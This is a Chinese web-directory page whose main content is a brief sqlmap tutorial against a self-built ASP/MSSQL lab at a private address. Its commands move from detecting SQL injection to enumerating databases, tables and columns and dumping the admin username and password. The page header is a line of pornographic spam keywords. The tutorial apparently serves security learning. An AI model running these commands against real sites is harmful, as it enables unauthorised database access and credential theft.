日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

今天搭建了一個asp+mssql數據庫的環境用于安全測試學習

1.判斷注入點及獲取網站信息:

sqlmap -u http://192.168.1.30/1/onews.asp?id=8

實戰黑客sqlmap滲透攻擊mssql數據庫最新教程

 

web server operating system: windows 2003 or XP

web Application technology: ASP.NET, Microsoft IIS 6.0, ASP

back-end DBMS: Microsoft SQL Server 2005

2.獲取所有數據庫:

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 --dbs

 

實戰黑客sqlmap滲透攻擊mssql數據庫最新教程

 

網站用的數據庫是這個sqlZR

3.獲取網站當前使用的數據庫:

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 --current-db

實戰黑客sqlmap滲透攻擊mssql數據庫最新教程

 

4.獲取數據庫中的表名:

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR --tables

實戰黑客sqlmap滲透攻擊mssql數據庫最新教程

 

5.獲取數據表中的字段名:

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR -T Admin --columns

實戰黑客sqlmap滲透攻擊mssql數據庫最新教程

 

6.獲取字段中的內容

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR -T admin -C "admin,password" --dump

實戰黑客sqlmap滲透攻擊mssql數據庫最新教程

 

看到了吧,幾條命名就把管理員的賬號密碼給跑出來了。

分享到:
標簽:滲透 攻擊
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定